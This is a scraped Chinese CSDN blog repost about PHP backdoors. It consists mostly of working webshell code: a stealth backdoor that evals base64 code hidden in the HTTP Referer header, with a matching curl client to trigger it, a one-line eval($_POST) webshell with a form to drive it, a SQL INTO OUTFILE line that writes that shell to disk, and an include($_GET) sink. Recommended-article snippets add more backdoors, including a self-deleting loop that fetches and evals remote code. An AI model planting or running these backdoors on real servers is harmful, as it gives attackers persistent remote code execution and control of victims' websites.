[转]关于PHP后门

最新推荐文章于 2021-07-11 18:19:08 发布
最新推荐文章于 2021-07-11 18:19:08 发布
阅读量217 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liNewman/article/details/86575930
版权

[转]关于PHP后门

http://www.oschina.net/code/snippet_164175_21174?p=1#comments

当过滤  POST  GET   COOKIE 时 , 注意 $_SERVER [ 'HTTP_REFERER' ]
1.php  上传后门代码
《?php
//1.php
header( 'Content-type:text/html;charset=utf-8' );
parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a );
if (reset( $a ) == '10' && count ( $a ) == 9) {
    eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6)))));
}



2.php 本地
《?php
//2.php
header( 'Content-type:text/html;charset=utf-8' );
//要执行的代码
$code = <<
phpinfo();
CODE;
//进行base64编码
$code = base64_encode ( $code );
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ;
//后门url
$url = 'http://localhost/test1/1.php' ;
$ch = curl_init();
$options = array (
     CURLOPT_URL => $url ,
     CURLOPT_HEADER => FALSE,
     CURLOPT_RETURNTRANSFER => TRUE,
     CURLOPT_REFERER => $referer
);
curl_setopt_array( $ch , $options );
echo curl_exec( $ch );


------------------
注意CURL


-------------------------
《?php @eval_r($_POST['c']);?》



《html>  
《body>  
《form action="a.php" method="post">  
《input type="text" name="c" value="phpinfo();">  
《input type="submit" value="submit">  
《/form>  
《/body>  
《/html>  

-------------------


select '《?php @eval_r($_POST["c"]);?》' INTO OUTFILE 'e:/m.php'  


--------------
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
posted @ 2016-04-18 17:34 Newman·Li 阅读( ...) 评论( ...) 编辑 收藏
liNewman
关注
Web安全--文件上传漏洞--通用漏洞--PHP
weixin_68243135的博客
11-17 772
Web安全--文件上传--绕过--php
PHP后门PHP后门的集合。 仅用于教育或测试目的
02-05
PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与...
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 786
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
php上传后门,Dedecms疑似被植入后门 上传PHP后门可控制整个网站
weixin_28871989的博客
03-10 322
Admin5站长网2月21日消息,昨日乌云漏洞报告平台()发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站...
Raccoon——(Web)PHP 后门分析writeup
qq_39480875的博客
05-21 295
网页源代码如下:(我已经备注了很详细的注释) <?php $z0=$_REQUEST['sort']; $q1=''; $c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2"; $y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7); foreach($y3 as $h4){$q1.=$c2[$h4];...
上传脚本文件(一句话后门)WAF绕过(php)
weixin_43916797的博客
07-11 304
变量覆盖、 1.变量覆盖 要上传的脚本: <?php $a = $_GET['x']; $$a = $_GET['y']; $b(base64_decode($_POST['z'])); > phpinfo();为base64为:cGhwaW5mbygpOw== url为:www.xxx.com?x=b&y=assert 传入的data: x= cGhwaW5mbygpOw== 2.加密混淆 将脚本文件加密 加密连接:http://phpjiami.com/phpjiami.html
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
php后门URL的防范
10-26
这通常发生在开发过程中,由于配置不当或疏忽,使得...通过实施这些策略,开发者可以显著降低PHP后门URL的风险,保护应用程序免受未经授权的访问和恶意活动的侵害。记住,安全是持续的过程,需要不断评估、更新和改进。
一个不易被发现的PHP后门代码解析
10-25
在网络安全领域,PHP后门是一种常见的安全威胁。后门是一种隐藏的入口,可以让攻击者绕过正常的认证过程,从而获取对系统的未经授权访问。本文将对一种不易被发现的PHP后门代码进行详细解析。 首先,我们来了解后门...
Php后门php 后门
06-25
php 后门
那些强悍的PHP一句话后门
大方子
08-06 9458
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
php后门隐藏技巧
weixin_34150503的博客
08-25 361
一句话 and 大马phpspy 菜刀一句话<?php@eval($_POST['cmd']);?>反射后门<?php$func = new ReflectionFunction($_GET[m]);echo $func->invokeArgs(array($_GET[c]));?>调用如x.php?m=system&c=...
PHP后门
qq_41750040的博客
03-28 975
<?php $admin['check'] = false; $password = 'chenff';//ÉèÖÃÃÜÂë $c = "chr"; session_start(); if (empty($_SESSION['PhpCode'])) { $url = $c(104).$c(116).$c(116).$c(112).$c(58).$c(47).$c(47); $...
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2873
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
c#实现俄罗斯方块,面向对象实现
09-15
俄罗斯方块(Tetris)是一款经典的益智游戏,由俄罗斯程序员阿列克谢·帕基特诺夫于1984年开发。游戏的主要目标是通过旋和移动不同形状的方块(称为“砖块”或“Tetrominoes”),将它们填充到屏幕底部的水平行中。当一行被完全填满时,该行会消失,玩家将获得积分。 游戏特点: 砖块形状:游戏中有七种不同形状的砖块,每种砖块由四个方块组成。 下落机制:砖块从屏幕顶部逐渐下落,玩家需要快速做出决策。 得分系统:消除的行越多,得分越高,连续消除多行会获得额外分数。 难度递增:随着游戏进行,砖块下落的速度会逐渐加快,增加了游戏的挑战性。 文化影响: 俄罗斯方块不仅在游戏界取得了巨大的成功,还成为了流行文化的一部分,影响了许多后续的游戏设计。它的简单性和上瘾性使其成为了历史上最畅销的电子游戏之一。 版本与平台: 自发布以来,俄罗斯方块已经在多个平台上推出,包括家用游戏机、电脑、手机等,形成了众多不同的版本和变种。
5G网络优化案例:关于解决诺基亚5G 700M站点小区闪断问题解决.pdf
09-15
这份文件是关于解决诺基亚5G 700M站点小区闪断问题的详细案例报告,主要内容和关键要点如下: 问题背景与初步分析: 问题描述:随着5G 700M网络建设的推进,诺基亚700M现网出现较多误码告警和小区闪断问题,故障比例明显高于其他厂家站点。 初步定位:通过归类法分析,发现绝大部分误码问题发生在烽火单芯双向光模块小区,占比高达95.65%。 故障根因深入探究: 光模块适配问题:初步认为烽火单纤双向光模块存在问题,但更换后问题依旧,进一步分析为光模块与诺基亚设备的适配问题。 深入测试与定位:选取5个长期误码小区进行深入分析,与烽火厂家合作对光模块进行程序升级,问题得到初步解决。 AUTOBYPASS机制分析: 机制介绍:烽火光模块采用25G模块速率兼容10G,并开启AUTOBYPASS(CPR自动旁路模式)功能。 影响分析:AUTOBYPASS机制与诺基亚设备不适配,导致交互失败和误码产生。关闭AUTOBYPASS后,CDR时钟校验和恢复周期缩短,交互频繁,误码问题消失。 解决方案与实施: 解决方案:针对所有使用此类光模块的诺基亚站点,通过优化升级烽火光模块,关闭AUTOBYPASS功
在线请假管理系统.zip
09-15
这是一个基于Python Flask的Web应用程序,采用Bulma uI框架和Postgresql数据库,用于管理和处理员工的请假事宜。用户可以通过这个系统创建安全的用户账户并登录,员工可以提交请假申请等待上级审批,并查看历史请假记录。经理可以审批或拒绝员工的请假申请,并查看团队的请假记录。此外,管理员还可以查看所有员工信息,添加新员工并分配经理,编辑和删除员工信息。该项目在heroku上托管,提供在线服务。安装步骤包括克隆项目、创建虚拟环境、激活环境并安装依赖项等。还提供了数据库迁移和初始化、运行应用程序以及数据重置等实用工具命令。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.文md件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
performance-timing.js利用HTML5的navigation_timing_API_performance
最新发布
09-15
performance-timing.js利用HTML5的navigation_timing_API_performance-timing
PHP无eval后门技巧解析
"这篇文章主要探讨了PHP中无eval的代码执行后门方法,包括assert、create_function、preg_replace以及mb_ereg_replace等函数的使用。虽然PHP 7对某些函数进行了限制,但仍然存在绕过的方式。" 在PHP中,进行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值